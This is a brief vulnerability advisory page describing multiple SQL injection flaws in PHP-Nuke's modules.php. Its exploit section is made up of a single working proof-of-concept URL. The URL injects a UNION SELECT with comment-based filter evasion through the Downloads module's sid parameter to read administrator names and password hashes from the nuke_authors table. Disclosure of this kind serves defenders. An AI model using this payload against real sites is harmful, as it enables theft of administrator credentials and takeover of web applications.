• info
• discussion
• exploit
• solution
• references

PHP-Nuke Modules.php Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concept example has been provided:
http://www.example.com/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radmins
uper=1/**/LIMIT/**/1/*